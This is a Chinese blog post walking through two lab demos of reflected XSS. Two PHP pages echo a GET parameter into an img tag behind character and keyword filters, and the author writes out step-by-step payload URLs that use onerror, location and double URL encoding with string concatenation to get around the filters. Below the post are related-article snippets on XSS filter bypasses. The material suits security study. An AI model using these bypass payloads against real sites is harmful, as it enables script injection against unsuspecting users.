复现urlcode编码绕过xss限制两个demo

最新推荐文章于 2023-11-27 20:58:09 发布
最新推荐文章于 2023-11-27 20:58:09 发布
阅读量586 收藏
点赞数
分类专栏: 网络安全 文章标签: xss php 前端
ikta
本文链接:https://blog.csdn.net/weixin_44811851/article/details/127781330
版权

复现urlcode编码绕过xss限制两个demo

后端源码:demo.php

<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
echo "<img src=\"{$xss}\">";
?>

'X-XSS-Protection: 0' 的意思是关闭浏览器xss防护,因为以前chrome,Firefox都有xss防护机制

$xss = isset($_GET['xss'])?$_GET['xss']:'' 是三元运算符,?前为判断条件当前面的值为真,则运行":“前的,为假运行”:"后的。

首先:

我们要逃出双引号的限制,才能运行我们的恶意代码

demo.php?xss=aaa" οnerrοr="alert(1)img src=“aaa” οnerrοr=“alert1”
demo.php?xss=aaa" οnerrοr="alert%281%29img src=“aaa” οnerrοr=“alert1”
demo.php?xss=aaa" οnerrοr="alert%25281%2529img src=“aaa” οnerrοr=“alert%281%29”
demo.php?xss=aaa" οnerrοr=location="alert(1)
demo.php?xss=aaa" οnerrοr=location="alert%25281%2529
demo.php?xss=aaa" οnerrοr=location="javascript:alert%25281%2529bypass

在这里插入图片描述

后端代码:demo1.php

<?php
header('X-XSS-Protection: 0');
$xss = isset($_GET['xss'])?$_GET['xss']:'';
$xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss);
if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) {
    exit('bad');
}
echo "<img src=\"{$xss}\">";
?>

在上面的基础上进一步过滤script、document、cookie、eval、setTimeout、alert关键字。

因为onerror是js函数,不能编码符号,因此还是需要location这样的函数将其变为字符串拼接绕过。

拼接时需注意,符号:”+“和”:“都需编码(卡了我好久才发现问题)

URL编码

>>> ord(":")
58
\>>> hex(58)
'0x3a'

\>>> ord("+")
43
\>>> hex(43)
'0x2b'
\>>>

过程如下:

demo1.php?xss=aaa" οnerrοr=location="javascript:alert(1)bad
demo1.php?xss=aaa"%20οnerrοr=location=“javas”+“cript:al”+"ert%25281%2529bad
demo1.php?xss=aaa"%20οnerrοr=location=“javas”%2b"cript%3aal"%2b"ert%25281%2529bypass

οnerrοr=location=“javas”%2b"cript%3aal"%2b"ert%25281%2529 | bypass |

在这里插入图片描述

薄荷加冰心有多冷
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
urlcode编码绕过xss限制
weixin_42902697的博客
11-10 690
urlcode编码绕过xss限制
复现urlcode编码绕过xss限制两个案例
weixin_57507186的博客
11-10 1088
复现urlcode编码绕过xss限制两个例子,GET传递的参数直接输出在src中会存在反射型xss漏洞,本次复现的目的是利用url编码规则构造url绕过xss限制
Web 安全之 X-XSS-Protection 详解
路多辛的所思所想
11-27 1811
跨站脚本(XSS)是一种常见的网络攻击,攻击者通过在网站中插入恶意脚本,当用户访问被污染的页面时,恶意脚本会被执行,从而窃取用户的敏感信息、篡改页面内容或者执行其他恶意操作。XSS 攻击分为三种类型:持久型、DOM-based 型和反射型 XSS(非持久型)。持久型 XSS:攻击者在网页中插入恶意脚本,并将其保存到服务器或数据库中。当其他用户访问该页面时,恶意脚本会被执行,从而进行长期的网络攻击。这种类型的攻击比较危险,因为可以长期地影响用户。
反射型XSS(Reflected)DVWA全等级绕过方法
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
11-30 3907
本站所有文章均为原创,欢迎转载,请注明文章出处[https://blog.csdn.net/weixin_43847838/article/details/110358618](https://blog.csdn.net/weixin_43847838/article/details/110358618).。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
某次XSS绕过总结
Fly_鹏程万里
10-18 2860
0x01 背景 前段时间苏宁src五倍积分,想着无事刷一刷玩玩,碰到一个反射型XSS,如下图: 插入&lt;img src=a&gt;测试正常(此处截图遗失,漏洞已修补),证明存在XSS,但是过滤了许多关键词,很难执行代码,于是有了接下来的一波绕过。 0x02 测试过滤机制 经不断测试,发现存在如下过滤机制: 1、”&lt;script”,”alert(“,”prompt(“...
第04篇:XSS三重URL编码绕过实例1
08-03
本文主要探讨了一个XSS三重URL编码绕过的实例,揭示了在某些情况下,简单的防御措施可能不足以阻止攻击。 首先,我们要理解XSS的基本概念。XSS攻击通常发生在Web应用程序未能正确过滤或转义用户输入的情况下。当...
XSS三重URL编码绕过实例.pdf
最新发布
04-22
### XSS三重URL编码绕过实例解析 #### 一、跨站脚本攻击(XSS)简介 跨站脚本攻击(Cross Site Scripting),简称XSS,是一种常见的网络安全威胁,它利用目标网站的信任关系向用户注入恶意脚本。攻击者通过在网页中...
第十三节 利用CSS特性绕过XSS过滤-01
09-15
利用CSS特性绕过XSS过滤 在Web安全领域中,XSS(Cross-Site Scripting)是一种常见的攻击方式,它通过在目标网站中插入恶意脚本来攻击用户。为了防止XSS攻击,很多网站都部署了XSS过滤机制。但是,攻击者可以利用...
第十二节 利用IE特性绕过XSS过滤-01
09-15
XSS 攻击和 IE 特性绕过 XSS 过滤 XSS(Cross-Site Scripting),即跨站脚本攻击,是一种常见的 Web 应用安全漏洞。攻击者可以通过在目标网站中Inject恶意脚本,劫持用户会话,盗取敏感信息,甚至控制用户的浏览器...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
PHP代码审计DVWA[XSS (Reflected)]
weixin_54882883的博客
08-22 220
又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)反射型xss,其实练习完就能感受到比起存储型xss,利用起来要困难很多反射型不像存储型会存储在网站上,当别人来访问时就会执行,这里需要我们自己来构造链接诱使用户点击,这比起存储型xss就明显复杂很多,存储xss,类似留言板我们把xss payload仍上去后不用管,只要不被删,用户的信息就会往我们的xss平台上发了。
Web安全:X-XSS-Protection头(防XSS攻击设置)
热门推荐
TivonaLH的博客
01-11 3万+
1.参考资料链接:https://www.freebuf.com/articles/web/138769.html 2.X-XSS-Protection头的三个值 0: 表示关闭浏览器的XSS防护机制 1:删除检测到的恶意代码, 如果响应报文中没有看到X-XSS-Protection 字段,那么浏览器就认为X-XSS-Protection配置为1,这是浏览器的默认设置 1; mode=bl...
XSS下的绕过过滤方法
ECSHOP专属建设
04-09 673
很久没有写过文章了,今天写一篇小品文,仍然是关于XSS下的利用。 很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,最常见的就是对,经过转换以后被转换掉,什么就会转换成“src=1.js>”,不能执行,因此,很多人认为只要用户的输入没有构成 但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS。 1. 转义字符 首先要认识一下“\”,这个不是斜杠么。对
安全-反射性xss基础注入
m0_63069714的博客
11-08 355
题目中明确说明不能出现以下关键字(script|document|cookie|eval|setTimeout|alert),因此就将这些字符串进行拼接,在javascript中拼接字符串可以直接使用+,但是在url地址栏中,+会被url转义为空格,因此需要将+进行urlcode编码。其他原因与上次的题目相同。2、下面代码是通过正则表达式,将get上传的参数进行了过滤,将" ( ", " ) ", " & ", " \\ ", " < ", " > ", " ' "这些符号进行了替换,替换结果为空。
XSS攻击绕过过滤方法大全(转)
mingyqf的博客
04-20 2万+
XSS攻击绕过过滤方法大全(约100种) 虽然说很多网站为了避免XSS的攻击,对用户的输入都采取了过滤,但是,万事总有可能,只要有一定的条件,我们就可以构造经过编码后的语句来进行XSS注入。 这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录,现在此XSS备忘录将由OWASP维护和完善它。 OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Cheat She
45. XSS篇——XSS过滤绕过技巧
Fly_鹏程万里
03-20 2万+
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程! 改变大小写 在测试过程中,我们可以改变测试语句的大小写来绕过XSS规则: 比如:<script>alert(“xss”);</script>可以...
使用HTTP头去绕过WAF
煜铭2011
07-04 7003
0x00 前言     现在,各个安全厂商的WAF越来越多了,虽然它们的WAF卖得挺贵,但是买的人也不少(运营商、互联网企业、政府部门、传统的产业)。因此我们也是经常碰到那么多WAF啊,绕过WAF技术千姿百态,各种天花乱坠的的招数。有些招数对于V WAF绕得过,有些招数对于N WAF可以绕过,还有的招数对于哪个WAF都绕不过(自认倒霉吧,估计管理设置WAF策略的兄弟妹子也是一个高手,要不然就是他
xss检测和绕过方法
ylcangel的专栏
03-03 7031
xss 测试步骤: 1、输入一个几乎不出现的字符串在应用程序中,以其作为每个页面的每一个参数,且每次只针对一个参数, 监控程序响应,看是否出现同样字符串,然后替换字符串为脚本,在进行测试。 2、进行避开过滤测试。 3、post发现xss,要用burp的get同样继续测试. 4、对http消息头进行测试。 实例(如输入myxsstest),进行这些测试时必须对任何特殊字符如&amp;,=+;和空格...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值